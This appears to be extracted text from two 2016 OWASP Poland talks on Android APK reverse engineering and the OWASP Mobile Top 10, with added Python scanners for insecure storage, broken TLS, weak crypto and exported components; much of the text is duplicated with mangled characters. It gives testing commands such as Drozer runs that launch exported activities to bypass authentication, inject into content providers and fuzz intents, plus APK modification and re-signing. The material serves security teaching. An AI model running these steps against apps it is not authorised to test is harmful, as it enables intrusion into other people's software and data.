id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in /sdcard before and after installing an application
• Analyze package files at different stages:
  adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
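The adb pull step above hands you the app's private directory; as an added example that is not from the talk, the Python below applies the two checks these slides describe: which regular files under /data/data/<package> are readable or writable by other UIDs (the MODE_WORLD_READABLE problem, and what made the Outlook attachments exposed), and which shared_prefs keys look like credentials stored as plain strings. The `ls -lR` output and the preferences XML are constructed samples.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample of `adb shell ls -lR /data/data/com.example.app` output
SAMPLE_LS = """\
/data/data/com.example.app:
drwxrwx--x 5 u0_a123 u0_a123 4096 2016-02-24 10:00 .
drwxrwx--x 2 u0_a123 u0_a123 4096 2016-02-24 10:00 databases
drwxrwx--x 2 u0_a123 u0_a123 4096 2016-02-24 10:00 shared_prefs

/data/data/com.example.app/databases:
-rw-rw---- 1 u0_a123 u0_a123 20480 2016-02-24 10:01 app.db
-rw-rw-rw- 1 u0_a123 u0_a123  8192 2016-02-24 10:01 cache.db

/data/data/com.example.app/shared_prefs:
-rw-rw-r-- 1 u0_a123 u0_a123   412 2016-02-24 10:02 session.xml
-rw------- 1 u0_a123 u0_a123   118 2016-02-24 10:02 settings.xml
"""

# Constructed sample of a SharedPreferences file (session.xml)
SAMPLE_PREFS = """\
<map>
    <string name="username">alice</string>
    <string name="password">hunter2</string>
    <string name="auth_token">0123456789abcdef</string>
    <boolean name="dark_mode" value="true" />
    <int name="launch_count" value="7" />
</map>
"""

# mode, links, owner, group, size, date, time, name
LS_LINE = re.compile(
    r"^([-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+\S+\s+\S+\s+(.+)$")
# key names that usually hold credentials (heuristic, tune per application)
SECRET_KEY = re.compile(r"pass|pwd|token|secret|cookie|session|pin|key", re.IGNORECASE)


def world_accessible(ls_output: str):
    """Regular files whose 'other' permission bits grant read or write.
    Every installed app runs under its own UID, so 'other' means any app."""
    findings, cwd = [], ""
    for line in ls_output.splitlines():
        if line.endswith(":"):            # directory header of a recursive listing
            cwd = line[:-1]
            continue
        m = LS_LINE.match(line)
        if not m or m.group(2) in (".", ".."):
            continue
        mode, name = m.groups()
        others = mode[7:10]
        if mode[0] == "-" and ("r" in others or "w" in others):
            findings.append((cwd + "/" + name, mode))
    return findings


def plaintext_secret_keys(prefs_xml: str):
    """Keys in a SharedPreferences XML whose name suggests a credential and
    whose value is stored as a readable <string> (not a flag or counter)."""
    root = ET.fromstring(prefs_xml)
    return [el.get("name") for el in root
            if el.tag == "string" and SECRET_KEY.search(el.get("name", ""))]


if __name__ == "__main__":
    for path, mode in world_accessible(SAMPLE_LS):
        print("world-accessible:", mode, path)
    print("plaintext secrets in shared_prefs:", plaintext_secret_keys(SAMPLE_PREFS))
```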
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak protocol versions or ciphers (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of a certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
  sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
  dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
  adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
  dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user/see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise an operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server side whenever possible
• Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in an attacker-readable folder or hardcoded within the binary)
• Try to break the encryption algorithm if an application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/5, SHA1, etc.)
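The "how to find" steps for M3, M4 and M6 all come down to reading decompiled source for a handful of patterns. As an added example (not the talk's code, and a far smaller rule set than Mallodroid or QARK), the Python scanner below runs those checks over a constructed Java fragment of the kind dex2jar + JD-GUI produces: a trust-all TrustManager and hostname verifier, an SSLv3 context, a password written to logcat, ECB mode, MD5 and a hardcoded key.

```python
import os
import re

# Constructed sample of decompiler output (dex2jar + JD-GUI), not a real app
SAMPLE_JAVA = """\
public class NetClient {
    private static final String KEY = "S3cr3tK3y1234567";

    public void connect(String password) throws Exception {
        TrustManager[] tm = new TrustManager[] { new X509TrustManager() {
            public void checkClientTrusted(X509Certificate[] c, String a) { }
            public void checkServerTrusted(X509Certificate[] c, String a) { }
            public X509Certificate[] getAcceptedIssuers() { return null; }
        } };
        HostnameVerifier hv = new HostnameVerifier() {
            public boolean verify(String host, SSLSession s) { return true; }
        };
        SSLContext ctx = SSLContext.getInstance("SSLv3");
        Log.d("NetClient", "password=" + password);
        Cipher c = Cipher.getInstance("AES/ECB/PKCS5Padding");
        SecretKeySpec k = new SecretKeySpec(KEY.getBytes(), "AES");
        MessageDigest md = MessageDigest.getInstance("MD5");
    }
}
"""

# (risk, description, pattern): each pattern encodes one bullet from the slides
RULES = [
    ("M3", "checkServerTrusted with an empty body: trusts any certificate",
     re.compile(r"checkServerTrusted\s*\([^)]*\)[^{]*\{\s*\}")),
    ("M3", "HostnameVerifier.verify always returns true: accepts any hostname",
     re.compile(r"\bverify\s*\([^)]*\)[^{]*\{\s*return\s+true\s*;\s*\}")),
    ("M3", "ALLOW_ALL_HOSTNAME_VERIFIER in use",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER")),
    ("M3", "weak protocol or cipher requested (SSLv2/SSLv3/RC4)",
     re.compile(r"\"(SSLv2|SSLv3|SSL)\"|RC4")),
    ("M4", "credential or token written to logcat",
     re.compile(r"Log\.[dviwe]\s*\(.*(password|passwd|token|secret|pin)",
                re.IGNORECASE)),
    ("M6", "ECB mode cipher",
     re.compile(r"Cipher\.getInstance\(\s*\"[^\"]*ECB")),
    ("M6", "weak hash algorithm (MD4/MD5/SHA-1)",
     re.compile(r"MessageDigest\.getInstance\(\s*\"(MD4|MD5|SHA-?1)\"")),
    ("M6", "key built from a literal or constant: hardcoded key",
     re.compile(r"new\s+SecretKeySpec\s*\(\s*(\"[^\"]*\"|[A-Z_][A-Z0-9_]*)\.getBytes\(")),
    ("M6", "credential-looking constant string in the source",
     re.compile(r"static\s+final\s+String\s+\w*(KEY|SECRET|PASSWORD|TOKEN)\w*\s*=\s*\"[^\"]+\"")),
]


def scan_source(source: str):
    """Return sorted (line_number, risk, description) tuples for every hit."""
    findings = []
    for risk, desc, pattern in RULES:
        for m in pattern.finditer(source):
            line_no = source.count("\n", 0, m.start()) + 1
            findings.append((line_no, risk, desc))
    return sorted(findings)


def scan_tree(root_dir: str):
    """Scan every .java file under a decompiled tree (e.g. a JD-GUI export)."""
    results = {}
    for dirpath, _, files in os.walk(root_dir):
        for f in files:
            if f.endswith(".java"):
                path = os.path.join(dirpath, f)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
                if hits:
                    results[path] = hits
    return results


if __name__ == "__main__":
    for line, risk, desc in scan_source(SAMPLE_JAVA):
        print(f"line {line:3d} [{risk}] {desc}")
```

The rules are string matches, so they flag intent rather than prove reachability: every hit still needs to be confirmed in the decompiled code, as the slides' manual review step does.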
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on a device. Use password-based encryption instead
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as an input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application via intent/content provider
  – Shared file
  – Server response
  – Third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android's toy – the Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
  Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
  Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
  dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
  dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
  dz> run app.package.manifest -a <package_name>
  dz> run app.activity.info -a <package_name>
  dz> run app.service.info --permission null -a <package_name>
  dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
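Both the M5 step (exported activities reachable with Drozer) and the M7 mitigation (explicit Intents only, beware intent-filters) come down to what the manifest declares. As an added example that is not the talk's code, the Python below reads a decoded AndroidManifest.xml (what Apktool or `drozer app.package.manifest` gives you) and lists components exported without a permission, components that declare an intent-filter, and android:debuggable; the manifest is a constructed sample.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample of a decoded AndroidManifest.xml (as Apktool emits it)
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <activity android:name=".PaymentActivity" android:exported="false">
      <intent-filter>
        <action android:name="com.example.app.PAY"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="true"
             android:permission="com.example.app.SYNC"/>
    <provider android:name=".DataProvider" android:exported="true"
              android:authorities="com.example.app.data"/>
  </application>
</manifest>
"""


def is_launcher(component) -> bool:
    """The MAIN/LAUNCHER activity has to be exported; it is not a finding."""
    for f in component.findall("intent-filter"):
        actions = {a.get(ANDROID + "name") for a in f.findall("action")}
        categories = {c.get(ANDROID + "name") for c in f.findall("category")}
        if ("android.intent.action.MAIN" in actions
                and "android.intent.category.LAUNCHER" in categories):
            return True
    return False


def scan_manifest(xml_text: str):
    """Return (tag, name, issue) tuples in document order."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    if app.get(ANDROID + "debuggable") == "true":
        findings.append(("application", root.get("package"), "android:debuggable=true"))
    for comp in app.iter():
        if comp.tag not in COMPONENT_TAGS or is_launcher(comp):
            continue
        name = comp.get(ANDROID + "name")
        exported = comp.get(ANDROID + "exported")
        has_filter = comp.find("intent-filter") is not None
        # Before API 31 a component with an intent-filter and no explicit
        # android:exported attribute is exported by default (providers with
        # targetSdkVersion < 17 are exported by default too; not modelled here).
        is_exported = exported == "true" or (exported is None and has_filter)
        if is_exported and comp.get(ANDROID + "permission") is None:
            findings.append((comp.tag, name, "exported without android:permission"))
        if has_filter:
            findings.append((comp.tag, name,
                             "declares an intent-filter (implicit Intent surface)"))
    return findings


if __name__ == "__main__":
    for tag, name, issue in scan_manifest(SAMPLE_MANIFEST):
        print(f"<{tag}> {name}: {issue}")
```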
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should it REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
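The three proxy checks above (30-minute expiry, destruction on authentication state change, unguessable tokens) map directly onto the server-side mitigations. As an added example that is not from the talk, here is a minimal server-side session store in Python that satisfies them; timestamps are passed in explicitly so the expiry path can be exercised without waiting.

```python
import secrets

IDLE_TIMEOUT = 30 * 60      # seconds; the talk's "try the cookie after 30 minutes" test


class SessionStore:
    """Server-side session table. Tokens are opaque random values; nothing the
    client controls (device ID, user ID, timestamp) goes into them."""

    def __init__(self, idle_timeout: int = IDLE_TIMEOUT):
        self.idle_timeout = idle_timeout
        self._sessions = {}      # token -> {"user": str, "last_seen": float}

    def create(self, user: str, now: float) -> str:
        token = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG
        self._sessions[token] = {"user": user, "last_seen": now}
        return token

    def validate(self, token: str, now: float):
        """Return the user for a live session, or None. An idle-expired token
        is deleted on sight so it cannot be replayed later."""
        s = self._sessions.get(token)
        if s is None:
            return None
        if now - s["last_seen"] > self.idle_timeout:
            del self._sessions[token]
            return None
        s["last_seen"] = now
        return s["user"]

    def invalidate(self, token: str) -> None:
        """Logout: destroy the token server-side, not only in the app."""
        self._sessions.pop(token, None)

    def rotate(self, old_token: str, user: str, now: float) -> str:
        """Any authentication state change (login, user switch, privilege
        change) destroys the old session and issues a fresh token."""
        self.invalidate(old_token)
        return self.create(user, now)

    def live_count(self) -> int:
        return len(self._sessions)


if __name__ == "__main__":
    store = SessionStore()
    t0 = 1_456_300_000.0                    # arbitrary epoch timestamp
    tok = store.create("alice", t0)
    print("valid after 10 min:", store.validate(tok, t0 + 10 * 60))
    print("valid after 31 idle min:", store.validate(tok, t0 + 41 * 60))
```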
Thank you
pawelrzepa@outlook.com
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
